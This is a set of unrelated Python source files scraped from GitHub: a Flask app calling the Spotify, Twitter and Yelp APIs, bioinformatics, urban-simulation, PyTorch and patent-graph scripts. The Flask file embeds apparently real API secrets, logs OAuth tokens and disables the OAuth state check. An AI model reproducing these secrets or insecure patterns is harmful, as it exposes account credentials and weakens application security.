# oauth_token_secret = oauth_arr[1].split('=')[1]
oauth_token = oauth_arr[0].split('=')[1]
oauth_token_secret = oauth_arr[1].split('=')[1]
print (oauth_token, oauth_token_secret)
print("tokens:")
print(oauth_token, oauth_token_secret)
session.pop('twitter_token', None) # delete visits
session.pop('twitter_secret', None) # delete visits
session['twitter_token'] = oauth_token
session['twitter_secret'] = oauth_token_secret
session.modified = True
# posts = {"status": "test tweet"}
# token_url = 'https://api.twitter.com/1.1/statuses/update.json'
# tw = OAuth1(twitter_consumer_key,
# resource_owner_key=oauth_token,
# resource_owner_secret=oauth_token_secret,
# client_secret=twitter_consumer_secret)
# a = requests.post(token_url, data=posts, auth = tw)
# print (vars(a))
#
# auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
# auth.set_access_token(oauth_token, oauth_token_secret)
# # Create API object
# api = tweepy.API(auth)
# # Create a tweet
# api.update_status("Hello Tweepy2")
return redirect('/')
##############################
# Spotify section
##############################
# Spotify Prerequirements
CLI_ID = "035c861c44084c46bf08f93efed2bb4c"
CLI_SEC = "18cba64539fc4c39894f8b17b4e78b6e"
API_BASE = 'https://accounts.spotify.com'
REDIRECT_URI = "http://silt-tamu.herokuapp.com/api_callback"
SCOPE = 'playlist-modify-private,playlist-modify-public,user-top-read, user-library-read'
# Set this to True for testing but you probaly want it set to False in production.
SHOW_DIALOG = True
# Spotify pre-requirements end
@app.route("/spotify_authorize")
def authorize():
client_id = CLI_ID
redirect_uri = REDIRECT_URI
# TODO: change scope value
scope = SCOPE
# state_key = createStateKey(15)
# session['state_key'] = state_key
authorize_url = 'https://accounts.spotify.com/en/authorize?'
# parameters = 'response_type=code&client_id=' + client_id + '&redirect_uri=' + redirect_uri + '&scope=' + scope + '&state=' + state_key
parameters = 'response_type=code&client_id=' + client_id + '&redirect_uri=' + redirect_uri + '&scope=' + scope
response = make_response(redirect(authorize_url + parameters))
print("response")
return response
"""
Called after a new user has authorized the application through the Spotift API page.
Stores user information in a session and redirects user back to the page they initally
attempted to visit.
"""
@app.route('/api_callback')
def callback():
# make sure the response came from Spotify
# if request.args.get('state') != session['state_key']:
# # return render_template('index.html', error='State failed.')
# print("Error: State Failed")
# return
if request.args.get('error'):
# return render_template('index.html', error='Spotify error.')
print("Error: Spotify error")
else:
code = request.args.get('code')
# session.pop('state_key', None)
# get access token to make requests on behalf of the user
payload = getToken(code)
if payload != None:
session['token'] = payload[0]
session['refresh_token'] = payload[1]
session['token_expiration'] = time.time() + payload[2]
else:
# return render_template('index.html', error='Failed to access token.')
return "Failed to access token"
current_user = getUserInformation(session)
print("CURRENT USER:", current_user)
session['user_id'] = current_user['id']
# logging.info('new user:' + session['user_id'])
print("LOGGING: " + 'new user:' + session['user_id'])
# track_ids = getAllTopTracks(session)
artist_names, artist_ids = getAllTopArtists(session)
# if form.validate_on_submit() and form.tweet.data == True:
# post = Post(title=form.title.data, content=form.content.data, author=current_user)
# db.session.add(post)
# db.session.commit()
# flash('Your post has been created', 'success')
# return redirect(url_for('home'))
# print("------------------Artists---------------------")
time_range = ['short_term', 'medium_term', 'long_term']
# for i in range(len(artist_names)):
# term = time_range[i]
#
# for j in range(len(artist_names[0])):
# print(artist_names[i][j], artist_ids[i][j])
# SpotifyArtist = SpotifyArtist(user_id= , artist_name=artist_names[i][j], artist_id=artist_ids[i][j], time_range=term)
print("\nright before printing track_ids")
return profile(artists=artist_names, artist_ids=artist_ids)
def getToken(code):
token_url = 'https://accounts.spotify.com/api/token'
# authorization = app.config['AUTHORIZATION']
redirect_uri = REDIRECT_URI
# headers = {'Authorization': authorization, 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
headers = {'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded'}
body = {'code': code, 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code', 'client_id': CLI_ID, 'client_secret': CLI_SEC}
post_response = requests.post(token_url, headers=headers, data=body)
# 200 code indicates access token was properly granted
if post_response.status_code == 200:
json = post_response.json()
return json['access_token'], json['refresh_token'], json['expires_in']
else:
print("LOGGING: " + 'getToken:' + str(post_response.status_code))
# logging.error('getToken:' + str(post_response.status_code))
return None
"""
Makes a GET request with the proper headers. If the request succeeds, the json parsed
response is returned. If the request fails because the access token has expired, the
check token function is called to update the access token.
Returns: Parsed json response if request succeeds or None if request fails
"""
def makeGetRequest(session, url, params={}):
headers = {"Authorization": "Bearer {}".format(session['token'])}
response = requests.get(url, headers=headers, params=params)
# 200 code indicates request was successful
if response.status_code == 200:
return response.json()
# if a 401 error occurs, update the access token
elif response.status_code == 401 and checkTokenStatus(session) != None:
return makeGetRequest(session, url, params)
else:
# print("LOGGING: makeGetRequest")
# print("LOGGING: makeGetRequest: " + str(response.status_code))
# logging.error('makeGetRequest:' + str(response.status_code))
return None
def getUserInformation(session):
url = 'https://api.spotify.com/v1/me'
payload = makeGetRequest(session, url)
if payload == None:
return None
return payload
"""
Gets the top tracks of a user for all three time intervals. Used to display the top
tracks on the TopTracks feature page.
Returns: A list of tracks IDs for each of the three time intervals
"""
def getAllTopTracks(session, limit=10):
url = 'https://api.spotify.com/v1/me/top/tracks'
track_ids = []
time_range = ['short_term', 'medium_term', 'long_term']
for time in time_range:
track_range_ids = []
params = {'limit': limit, 'time_range': time}
payload = makeGetRequest(session, url, params)
# print("------------------PAYLOAD---------------------")
# print(payload)
# print("------------------PAYLOAD END-------------")
if payload == None:
return None
for track in payload['items']:
track_range_ids.append(track['id'])
track_ids.append(track_range_ids)
return track_ids
# TODO: situation where user has no tracks
def getAllTopArtists(session, limit=10):
url = 'https://api.spotify.com/v1/me/top/artists'
artist_names = []
artist_ids = []
time_range = ['short_term', 'medium_term', 'long_term']
for time in time_range:
track_range_ids = []
params = {'limit': limit, 'time_range': time}
payload = makeGetRequest(session, url, params)
if payload == None:
return None
artist_range_names = []
artist_range_ids = []
for artist in payload['items']:
artist_range_names.append(artist['name'])
artist_range_ids.append(artist['id'])
artist_names.append(artist_range_names)
artist_ids.append(artist_range_ids)
return artist_names, artist_ids
##############################
# Yelp API Section #
##############################
""" END POINTS """
# Business Search URL -- 'https://api.yelp.com/v3/businesses/search'
# Phone Search URL -- 'https://api.yelp.com/v3/businesses/search/phone'
# Transaction Search URL -- 'https://api.yelp.com/v3/transactions/{transaction_type}/search'
# Business Details URL -- 'https://api.yelp.com/v3/businesses/{id}'
# Business Match URL -- 'https://api.yelp.com/v3/businesses/matches'
# Reviews URL -- 'https://api.yelp.com/v3/businesses/{id}/reviews'
# Autocomplete URL -- 'https://api.yelp.com/v3/autocomplete'
# Define my API key, Endpoint, and Header
API_KEY = 'nTM36O5k4QpcgkccZVAMhP8U4BxpO68EYzIA7KPXpRmnT31qUK49B7sfYQ2uA2_uzGRr94oA9aIxdD4PyIa0hyaXIccmnOGCVQ2tMJg4s3-a24CLE3syjaMHsqWRX3Yx'
ENDPOINT_PREFIX = 'https://api.yelp.com/v3/'
HEADERS = {'Authorization': 'bearer %s' % API_KEY}
EMPTY_RESPONSE = json.dumps('')
# render popular locations webpage / make yelp API calls with user input for 'term' key
@app.route("/popular_locations", methods=['GET'])
def popular_locations():
# get user input from html form
term = request.args.get('searchInput', None)
# Check if user inputted a term
if term == None:
print("No term provided for business search, return nothing.")
# Define Business Search paramters
parameters = {
'location': 'College Station, TX',
'radius': 15000,
'term': term,
'sort_by': 'best_match',
'limit': 50
}
# Make request to Yelp API
url = ENDPOINT_PREFIX + 'businesses/search'
response = requests.get(url, params = parameters, headers = HEADERS)
# Check for good status code - if so, get JSON response and populate map
if response.status_code == 200:
print('Got 200 for business search')
# Try/catch for invalid user input for 'term': key-value
try:
# Convert JSON string to dictionary
businessSearchData = response.json()
# Create dataframe from API response (businesses, list of dictionaries)
dFrame = pd.DataFrame.from_dict(businessSearchData['businesses'])
# YELP MAP - RESTAURANTS MARKED
# Get latitude and longitude from Yelp API response
cStatLat = 30.627977
cStatLong = -96.334404
# Generate base map of college station
yelpMap = folium.Map(location = [cStatLat, cStatLong], zoom_start = 13)
# Generate map of restaurants - Iterate through dataframe and add business markers
for row in dFrame.index:
latLong = dFrame['coordinates'][row]
latitude = latLong['latitude']
longitude = latLong['longitude']
name = dFrame['name'][row]
rating = dFrame['rating'][row]
price = dFrame['price'][row]
location = dFrame['location'][row]
# Get address-1 from Location dictionary
for loc in location.keys():
if loc == 'address1':
address = location[loc]
# Create popup message for pin
details = ('{}' + '<br><br>' + 'Address: {}' + '<br>' + 'Price: {}' + '<br>' + 'Rating: {}/5').format(name, address, price, rating)
# Resize popup pin
test = folium.Html(details, script = True)
popup = folium.Popup(test, max_width = 300, min_width = 300)
# Create and business marker to map
marker = folium.Marker(location = [latitude, longitude], popup = popup, icon = folium.Icon(color = "darkred"))
marker.add_to(yelpMap)
# Display map on webpage
yelpMap.save('./templates/yelpMap.html')
except KeyError:
print('ERROR: User input provided an invalid key-value.')
flash(f'There was an error with your input.', 'danger')
return redirect(url_for('popular_locations'))
else:
print('Received non-200 response({}) for business search, returning empty response'.format(response.status_code))
return EMPTY_RESPONSE
return render_template('popularLocations.html', businessData = dFrame, isBusinessDataEmpty = dFrame.empty)
@app.route("/yelp_map")
def yelp_map():
return render_template('yelpMap.html')
@app.route("/empty_yelp_map")
def empty_yelp_map():
return render_template('./templates/blank_yelpMap.html')
if __name__ == '__main__':
app.run(debug=True)
| infknight/SILT | app.py | app.py | py | 37,771 | python | en | code | 0 | github-code | 36 |
74332199142 | from Bio import SeqIO
import sys
def readin_fasta(input_file, batch_size):
"""Read fasta file with a fast, memory-efficient generator."""
title_list = []
seq_list = []
seq_num = len([1 for line in open(input_file) if line.startswith(">")])
for i, seq_record in enumerate(SeqIO.FastaIO.SimpleFastaParser(open(input_file)),1):
title, seq = seq_record
title_list.append(title)
seq_list.append(seq)
if i%batch_size == 0:
yield title_list, seq_list
title_list = []
seq_list = []
if i == seq_num:
print('Converted {} of {} fragments'.format(i, seq_num))
yield title_list, seq_list
| elond/11785_Project | data_processing/encoding_convert/readin_fasta.py | readin_fasta.py | py | 697 | python | en | code | 0 | github-code | 36 |
6519474113 | from core_functions import Chain, Reel
from tabulate import tabulate
from colorama import init as colorama_init, Fore
class ChainOutput():
# constant: colorama colours for output
COLORS = {
"element": Fore.LIGHTWHITE_EX,
"element_loop": Fore.LIGHTYELLOW_EX,
"edge": Fore.LIGHTBLACK_EX,
}
# constant: symbols for output
SYMBOLS = {
"edge": " ━ "
}
def __init__(self, chain: Chain.Chain):
"""
constructor
@param chain: Chain to output
OUT:
a string of ints representing the chain
- each value is separated by an edge symbol
- loop values are highlighted in yellow
"""
# initialise colorama
colorama_init()
self.out = ""
# calculate chain and loop start index
array, loop_start = chain
# create list to store if idx in array is a loop value
self.idx_is_loop = []
for idx, item in enumerate(array):
# add item
self.out += self.COLORS["element_loop"] if idx >= loop_start else self.COLORS["element"]
self.out += str(item)
# add edge symbol if not last item
self.out += self.COLORS["edge"] + self.SYMBOLS["edge"] if idx != len(array) - 1 else ""
# reset highlight; it's the right thing to do :)
self.out += Fore.RESET
def __str__(self):
"""
string representation of ChainOutput
@return: out
"""
return self.out
class ReelOutput():
# constant: colorama colours for output
COLORS = {
"separator": Fore.LIGHTBLACK_EX
}
# constant: symbols for output
SYMBOLS = {
"separator": "┆"
}
# constant: table styles for tabulate
TABLE_STYLE = "plain"
# constant: custom middle separator for tabulate
MIDDLE_SEPARATOR = True
def __init__(self, reel: Reel.Reel):
"""
constructor
@param reel: Reel to output
"""
# initialise colorama
colorama_init()
# prepare table
self.array = [["Index", self.COLORS["separator"] + self.SYMBOLS["separator"] + Fore.RESET, "Chain"]]
# calculate chain and loop start index
for item in reel:
self.array.append([item.starting_value, self.COLORS["separator"] + self.SYMBOLS["separator"] + Fore.RESET, ChainOutput(item.chain)])
# remove middle column if MIDDLE_SEPARATOR is False
if not self.MIDDLE_SEPARATOR:
for col in self.array:
col.pop(1)
# use tabulate to format table
self.out = tabulate(self.array, tablefmt=self.TABLE_STYLE, headers="firstrow")
def __str__(self):
"""
string representation of ReelOutput
@return: out
"""
return self.out
| jahinzee/FourHasFourLetters | outputs.py | outputs.py | py | 2,885 | python | en | code | 0 | github-code | 36 |
28522630327 | # Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.datasets.dataset import Dataset
from opus_core.resources import Resources
from opus_core.choice_model import ChoiceModel
from opus_core.model import prepare_specification_and_coefficients
from opus_core.model import get_specification_for_estimation
from numpy import array, arange, where, ones, concatenate
from opus_core.variables.variable_name import VariableName
from opus_core.sampling_toolbox import sample_noreplace
from opus_core.misc import unique
from opus_core.logger import logger
from urbansim_parcel.datasets.development_project_proposal_dataset import DevelopmentProjectProposalDataset
from urbansim_parcel.models.development_project_proposal_sampling_model import DevelopmentProjectProposalSamplingModel
import copy
class DevelopmentProjectProposalChoiceModel(ChoiceModel, DevelopmentProjectProposalSamplingModel):
"""
"""
model_name = "Development Project Proposal Choice Model"
model_short_name = "DPPCM"
def __init__(self,
proposal_set,
sampler="opus_core.samplers.weighted_sampler",
weight_string = None,
run_config=None,
estimate_config=None,
debuglevel=0,
dataset_pool=None,
filter="development_project_proposal.status_id==%s" % DevelopmentProjectProposalDataset.id_tentative,
choice_attribute_name='is_chosen',
**kwargs):
self.id_selected = 9
self.proposal_set = proposal_set
self.filter = filter
self.choice_attribute_name = copy.copy(choice_attribute_name)
ChoiceModel.__init__(self, [1, 2],
choice_attribute_name=choice_attribute_name,
**kwargs)
DevelopmentProjectProposalSamplingModel.__init__(self,
proposal_set,
sampler="opus_core.samplers.weighted_sampler",
weight_string = "development_project_proposal.status_id==%s" % self.id_selected,
#weight_string = "development_project_proposal.status_id==%s" % self.id_selected,
run_config=run_config,
estimate_config=estimate_config,
debuglevel=debuglevel,
dataset_pool=dataset_pool)
def run(self, agents_index=None, n=500, *args, **kwargs):
agent_set = self.proposal_set
if self.filter is not None:
agents_index = where( self.proposal_set.compute_variables(self.filter) )[0]
choices = ChoiceModel.run(self, agent_set=agent_set, agents_index=agents_index, *args, **kwargs)
#logger.log_status("%s workers chose to work at home, %s workers chose to work out of home." %
#(where(agent_set.get_attribute_by_index(self.choice_attribute_name, kwargs['agents_index']) == 1)[0].size,
#where(agent_set.get_attribute_by_index(self.choice_attribute_name, kwargs['agents_index']) == 2)[0].size))
#logger.log_status("Total: %s workers work at home, %s workers work out of home." %
#(where(agent_set.get_attribute(self.choice_attribute_name) == 1)[0].size,
#where(agent_set.get_attribute(self.choice_attribute_name) == 2)[0].size))
self.proposal_set.set_values_of_one_attribute('is_chosen',
choices,
index=agents_index)
#DevelopmentProjectProposalSamplingModel.run(self, n=n)
def prepare_for_run(self,
specification_storage=None,
specification_table=None,
coefficients_storage=None,
coefficients_table=None,
data_objects=None,
**kwargs):
spec, coeff = prepare_specification_and_coefficients(specification_storage=specification_storage,
specification_table=specification_table,
coefficients_storage=coefficients_storage,
coefficients_table=coefficients_table, **kwargs)
return (spec, coeff)
def prepare_for_estimate(self, specification_dict = None,
specification_storage=None,
specification_table=None,
agent_set=None,
agents_for_estimation_storage=None,
agents_for_estimation_table=None,
filter_for_estimation_set=None,
data_objects=None):
specification = get_specification_for_estimation(specification_dict,
specification_storage,
specification_table)
if self.filter is not None:
agents_index = where( self.proposal_set.compute_variables(self.filter) )[0]
id_attribute_name = ['parcel_id', 'template_id', 'is_redevelopment']
if agents_for_estimation_storage is not None:
estimation_set = Dataset(in_storage = agents_for_estimation_storage,
in_table_name=agents_for_estimation_table,
id_name=id_attribute_name,
dataset_name=agent_set.get_dataset_name())
filter_index = arange(estimation_set.size())
if filter_for_estimation_set:
filter_index = where(estimation_set.compute_variables(filter_for_estimation_set, resources=Resources(data_objects)))[0]
estimation_set.subset_by_index(filter_index, flush_attributes_if_not_loaded=False)
id_attributes = None
for attr_name in id_attribute_name:
attr_value = agent_set.get_attribute_as_column(attr_name)
if id_attributes == None:
id_attributes = attr_value
else:
id_attributes = concatenate((id_attributes, attr_value), axis=1)
id_index = estimation_set.try_get_id_index(id_attributes, return_value_if_not_found=-1)
status_id = 2 * ones(agent_set.size(), dtype="int8")
status_id[where(id_index != -1)] = 1
name = self.choice_attribute_name.get_alias()
if name in agent_set.get_known_attribute_names():
agent_set.set_values_of_one_attribute(name, status_id[where(id_index != -1)], where(id_index!=-1)[0])
else:
agent_set.add_primary_attribute(status_id, name)
return (specification, agents_index)
| psrc/urbansim | urbansim_parcel/models/development_project_proposal_choice_model.py | development_project_proposal_choice_model.py | py | 7,581 | python | en | code | 4 | github-code | 36 |
39140033433 | import argparse
import os
from time import sleep
# === subroutines ===
def collect_files_for_removal(root: str) -> tuple[list[str], list[str]]:
if not os.path.exists(root):
return ([], [])
res_files = list()
res_folders = list()
for (dir_path, dirs, files) in os.walk(root, topdown=False):
files = [os.path.join(dir_path, file) for file in files if file.endswith('.class')]
res_files.extend(files)
res_folders.append(dir_path)
res_folders.remove(root)
return (res_folders, res_files)
# === CLI and Environment ===
workdir = os.path.abspath(os.curdir)
parser = argparse.ArgumentParser()
parser.add_argument(
'--output-dir', metavar='DIR', default='out',
help='a directory with *.CLASS files')
args = parser.parse_args()
output_dir = args.output_dir
# === main ===
output_dir = os.path.abspath(output_dir)
print('[i] Cleaning output directory:', output_dir)
dirs, files = collect_files_for_removal(output_dir)
# files first
for path in files:
os.remove(path)
# then folders
for path in dirs:
os.rmdir(path)
print('[i] Done!')
sleep(1)
| vpa-research/jsl-spec-generated | clear.py | clear.py | py | 1,122 | python | en | code | 0 | github-code | 36 |
73521408425 | import numpy as np
import pandas as pd
import os
import cv2
import re
import torch
import torchvision
from torchvision import transforms
from torchvision.models.detection.faster_rcnn import FastRCNNPredictor
from torchvision.models.detection import FasterRCNN
from torchvision.models.detection.rpn import AnchorGenerator
from torch.utils.data import DataLoader, Dataset
from torch.utils.data.sampler import SequentialSampler
from matplotlib import pyplot as plt
from sklearn.model_selection import KFold
from tqdm import tqdm
class TurbineDataset(Dataset):
"""
Custom PyTorch dataset for turbine image data.
This dataset is designed for object detection tasks where each image contains
annotations of turbine components. It can be used for both training and inference.
Args:
dataframe (pandas.DataFrame): The DataFrame containing image and annotation
information.
transforms (callable, optional): A function/transform to apply
to the image data.
train (bool, optional): Specify if the dataset is for training (True)
or inference (False).
Attributes:
image_ids (numpy.ndarray): Unique image IDs extracted from the DataFrame.
df (pandas.DataFrame): The input DataFrame containing image and annotation
information.
transforms (callable, optional): A function/transform for image data
augmentation.
train (bool): Indicates whether the dataset is for training (True) or
inference (False).
Methods:
__len__(): Returns the number of unique images in the dataset.
__getitem__(index): Retrieves an image and its associated annotations.
For training:
- Images are loaded and transformed.
- Annotations are retrieved and organized into a dictionary.
For inference:
- Only images are loaded and returned.
Returns:
If 'train' is True:
Tuple containing:
- image (torch.Tensor): The preprocessed image.
- target (dict): A dictionary containing annotations
(boxes, labels, etc.).
- image_id (str): ID of the image.
If 'train' is False:
Tuple containing:
- image (torch.Tensor): The preprocessed image.
- image_id (str): ID of the image.
"""
def __init__(self, dataframe, transforms=None, train=True):
super().__init__()
self.image_ids = dataframe['image'].unique()
self.df = dataframe
self.transforms = transforms
self.train = train
def __len__(self) -> int:
return self.image_ids.shape[0]
def __getitem__(self, index: int):
image_id = self.image_ids[index]
image = cv2.imread(image_id, cv2.IMREAD_COLOR)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB).astype(np.float32)
image /= 255.0
if self.transforms is not None:
image = self.transforms(image)
if self.train is False:
return image, image_id
records = self.df[self.df['image'] == image_id]
boxes = records[['minx', 'miny', 'maxx', 'maxy']].values
boxes = torch.as_tensor(boxes, dtype=torch.float32)
area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
area = torch.as_tensor(area, dtype=torch.float32)
labels = torch.ones((records.shape[0],), dtype=torch.int64)
iscrowd = torch.zeros((records.shape[0],), dtype=torch.int64)
target = {}
target['boxes'] = boxes
target['labels'] = labels
target['image_id'] = torch.tensor([index])
target['area'] = area
target['iscrowd'] = iscrowd
return image, target, image_id
class Averager:
"""
A utility class for calculating and maintaining the average of a series of values.
This class is typically used for computing the average loss during training
iterations.
Attributes:
current_total (float): The running total of values to be averaged.
iterations (float): The number of values added to the running total.
Methods:
send(value): Add a new value to the running total and update the number of
iterations.
value: Property that returns the average of the added values.
reset(): Reset the running total and number of iterations to zero.
Example Usage:
```
avg_loss = Averager()
avg_loss.send(2.0)
avg_loss.send(3.0)
average = avg_loss.value # Returns 2.5
avg_loss.reset() # Resets the total and iterations to zero.
```
Note:
If no values are added (iterations = 0), the `value` property returns 0 to
prevent division by zero.
"""
def __init__(self):
self.current_total = 0.0
self.iterations = 0.0
def send(self, value):
"""
Add a new value to the running total and update the number of iterations.
Args:
value (float): The value to be added to the running total.
"""
self.current_total += value
self.iterations += 1
@property
def value(self):
"""
Get the average value of the added values.
Returns:
float: The average value, or 0 if no values have been added
(iterations = 0).
"""
if self.iterations == 0:
return 0
else:
return 1.0 * self.current_total / self.iterations
def reset(self):
"""
Reset the running total and number of iterations to zero.
"""
self.current_total = 0.0
self.iterations = 0.0
def collate_fn(batch):
"""
Collates a batch of data elements into a structured format.
This function is typically used in data loading pipelines, such as when working with
PyTorch's DataLoader. It takes a batch of individual data elements and arranges them
into a structured format, often as a tuple or a dictionary, making it suitable for
further processing.
Args:
batch (list): A list of individual data elements to be collated.
Returns:
tuple: A tuple containing the collated data elements. The specific structure
of the returned tuple may vary depending on the data and the application.
Example Usage:
```
batch = [(image1, label1), (image2, label2), (image3, label3)]
collated_batch = collate_fn(batch)
# Example collated_batch: ((image1, image2, image3), (label1, label2, label3))
```
Note:
The structure of the returned tuple should match the requirements of the
downstream processing steps, such as model input.
"""
return tuple(zip(*batch))
def prepare_batches_for_training(folds: dict, selected_data: gdp.GeoDataFrame, number_of_fold: int):
trans = transforms.Compose([transforms.ToTensor()])
train_df = selected_data[selected_data['image'].isin(folds[number_of_fold]['train'])]
test_df = selected_data[selected_data['image'].isin(folds[number_of_fold]['test'])]
train_dataset = TurbineDataset(train_df, trans,True)
test_dataset = TurbineDataset(test_df, trans,True)
indices = torch.randperm(len(train_dataset)).tolist()
train_data_loader = DataLoader(
train_dataset,
batch_size=16,
shuffle=False,
num_workers=4,
collate_fn=collate_fn
)
test_data_loader = DataLoader(
test_dataset,
batch_size=8,
shuffle=False,
num_workers=4,
collate_fn=collate_fn
)
| fparaggio/wind-turbine-detector | src/wind_turbine_detector/pipelines/train/nodes.py | nodes.py | py | 7,569 | python | en | code | 0 | github-code | 36 |
11378821861 | def wrap(string, max_width):
"""
Takes in a string of length n and an integer
max_width < n, and returns the string wrapped
with lines no longer then max_width chars.
Parameters
----------
string : string
Input string.
max_width : int
Max number of chars before inserting
newline.
Returns
-------
result : string
Wrapped string.
"""
result = ""
for i in range(len(string)):
try:
result += string[i * max_width : (i + 1) * max_width] + "\n"
except IndexError:
result += string[i * max_width :]
return result
string, max_width = "ABCDEFGHIJKLIMNOQRSTUVWXYZ", 4
result = wrap(string, max_width)
print(result)
| scouvreur/hackerrank | python/strings/text_wrap.py | text_wrap.py | py | 743 | python | en | code | 1 | github-code | 36 |
31474544931 | #!/home/apollo/anaconda3/bin/python3
#-*- coding: utf-8 -*-
#******************************************************************************
# Author : jtx
# Create : 2020-03-31 19:05
# Last modified: 2020-04-09 14:18
# Filename : patent_kbp.py
# Description : 专利-->企业 关系添加
#******************************************************************************
import configparser
import sys
from pymongo import MongoClient
from pymongo import errors
from pyArango.connection import Connection as ArangoConnection
from pyArango.theExceptions import AQLFetchError
import pymysql
from dateutil import parser
import datetime
import json
import logging
import re
import copy
import requests
import os
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')
logger = logging.getLogger(__name__)
dir_path = os.path.dirname(__file__)
kbp_path = os.path.dirname(dir_path)
config_path = os.path.join(kbp_path,"config.ini")
class RelationPipeline(object):
def __init__(self):
self.config = configparser.ConfigParser()
self.config.read(config_path)
self.arango_con = ArangoConnection(arangoURL=self.config.get("arango","arango_url"),username= self.config.get("arango","user"),password=self.config.get("arango","passwd"))
self.arango_db = self.arango_con[self.config.get("arango","db")]
self.kb_patent = self.arango_db[self.config.get("arango","kb_patent")]
self.kb_company = self.arango_db[self.config.get("arango","kb_company")]
self.industry_url = self.config.get("url","patent_classifier")
self._init_division_schema() # init division_schema from mysql
self._init_industry_schema()
self.count_graph_update = 0 # arango更新关系数据数量
self.total = 0 # 处理日期总共需要添加关系的数量
def _init_division_schema(self):
'''
行政区域实体关系加载
'''
self.division_schema = {}
sql_conn = pymysql.connect( host = self.config.get("mysql","host") ,
user = self.config.get("mysql","user") ,
passwd = self.config.get("mysql","passwd"),
port = self.config.getint("mysql","port") ,
db = self.config.get("mysql","db"),
charset = "utf8" )
sql_cur = sql_conn.cursor()
# 初始化行政区域的关系schema
sql_query_industry = "select name, id, level, parent_id from {}".format(self.config.get("mysql","res_division"))
sql_cur.execute(sql_query_industry)
divisions = sql_cur.fetchall()
for division in divisions:
division_name, division_id, division_level, division_parent_id = division
self.division_schema[division_name] = {
"relation_type":"concept_relation/100004",
"object_name":division_name,
"object_type": "division",
"object_id": division_id
}
sql_cur.close()
sql_conn.close()
logger.info("MYSQL division schema 加载完成")
def _init_industry_schema(self):
'''
init loading industry schema at mysql res_industry table
'''
self.industry_schema = {}
sql_conn = pymysql.connect( host = self.config.get("mysql","host") ,
user = self.config.get("mysql","user") ,
passwd = self.config.get("mysql","passwd"),
port = self.config.getint("mysql","port") ,
db = self.config.get("mysql","db"),
charset = "utf8" )
sql_cur = sql_conn.cursor()
# 初始化产业/产业领域 schema
sql_query_industry = "select name, id, parent_id from {}".format(self.config.get("mysql","res_industry"))
sql_cur.execute(sql_query_industry)
labels = sql_cur.fetchall()
for industry in labels:
industry_name, industry_id, parent_id = industry
self.industry_schema[industry_id] = {
"relation_type":"concept_relation/100011",
"object_name":industry_name,
"object_type": "industry",
"object_id": industry_id,
"object_parent_id": parent_id
}
def query_process_patent(self, process_date):
if process_date == "yesterday":
process_date = (datetime.date.today() - datetime.timedelta(days=1)).strftime("%Y-%m-%d")
elif process_date == "today":
process_date = datetime.today().strftime("%Y-%m-%d")
elif len(process_date.split("-")) == 3:
process_date = process_date
else:
raise Exception("无效参数")
iso_date_str = process_date + 'T00:00:00+08:00'
iso_date = parser.parse(iso_date_str)
aql = "FOR patent IN {} FILTER patent.create_time >= '{}' SORT patent.create_time return patent".format(
self.config.get("arango","kb_patent"), iso_date)
try:
res = self.arango_db.fetch_list(aql)
except AQLFetchError as e:
'''没有查到相关数据时,fetch_list会抛出异常'''
res = []
logger.warn("Arango专利库没有查到数据",e)
self.total = len(res)
self.process_date = process_date
logger.info("[{}],专利知识库查到待处理数据[{}]个".format(process_date, self.total))
return res
def get_related_industry_tags(self, industry_id):
'''
根据子领域名称递归返回领域及所有父领域标签
'''
relations = []
# 过滤招商领域与图谱定义不一致的
if not industry_id in self.industry_schema:
return relations
relations.append(self.industry_schema[industry_id])
parent_id = self.industry_schema[industry_id]["object_parent_id"]
while (parent_id):
node = self.industry_schema[parent_id]
relations.append(node)
parent_id = node["object_parent_id"]
return relations
def process_company_rel(self, properties):
'''专利所属企业关系建立'''
company_rels = []
applicants = properties["applicant"]
applicant = list(set(applicants))
for applicant in applicants:
company = self.kb_company.fetchFirstExample({"name": applicant})
if not company:
continue
company = company[0] # company返回的是cursor
company_rel = {
"relation_type":"concept_relation/100001",
"object_name": company["name"],
"object_type": "company",
"object_id": company["_id"]
}
company_rels.append(company_rel)
return company_rels
def process_industry_rel(self, _key):
'''
产业领域标签ID化添加
'''
industry_tags = []
industry_field_tags = []
patent_id = _key
post_data = {
"patent_id": patent_id ,
}
pack_data = json.dumps(post_data)
try:
res = requests.post(self.industry_url, data=pack_data)
if res.status_code == 200:
tags = res.json().get("body")
industry_field_tags.extend(tags)
except Exception as e:
logging.error("获取专家产业领域失败,专家id=[{}],接口=[{}]".format(patent_id,self.industry_url),e)
for field in industry_field_tags:
for node in self.get_related_industry_tags(field["id"]):
if node not in industry_tags:
industry_tags.append(node)
return industry_tags
def process_division_rel(self, properties):
div_rel = []
province = properties["province"]
city = properties["city"]
area = properties["area"]
if province and province in self.division_schema.keys():
if province in ["北京市","上海市","重庆市","天津市"]:
province = province.replace("市","")
div_rel.append(self.division_schema[province])
if city and city in self.division_schema.keys():
if city in ["北京","上海","重庆","天津"]:
div_rel.append(self.division_schema[city+'市'])
if area and area in self.division_schema.keys():
div_rel.append(self.division_schema[area])
return div_rel
def process_relations(self, properties, _key):
'''
添加关系
'''
relations = []
company_rel = self.process_company_rel(properties)
relations.extend(company_rel)
# 关联产业分类
industry_rel = self.process_industry_rel(_key)
relations.extend(industry_rel)
# 籍贯关联的行政区划
#division_rel = self.process_division_rel(properties)
#relations.extend(division_rel)
return relations
def process(self, scan_date):
process_patents = self.query_process_patent(scan_date)
count = 0
# arango数据库专利信息处理
for patent in process_patents:
count += 1
#logger.info("处理专利关系,专利名=[{}]".format(patent["name"]))
patent_key = patent["_key"]
relations = self.process_relations(patent["properties"], patent_key)
try:
doc = self.kb_patent[patent_key]
doc["relations"] = relations
doc["update_time"] = datetime.datetime.today()
doc.save()
self.count_graph_update += 1
except Exception as e:
logger.error("专利关系添加失败,专利名=[{}],id=[{}]".format(patent["name"],patent_key))
if count % 100 == 0 or count == self.total:
logger.info("前[{}]家专利关系添加完成".format(count))
logger.info("日期[{}]专利知识库共找到专利{}个,arango专利库添加专利关系{}个".format(
self.process_date, self.total, self.count_graph_update))
if __name__=="__main__":
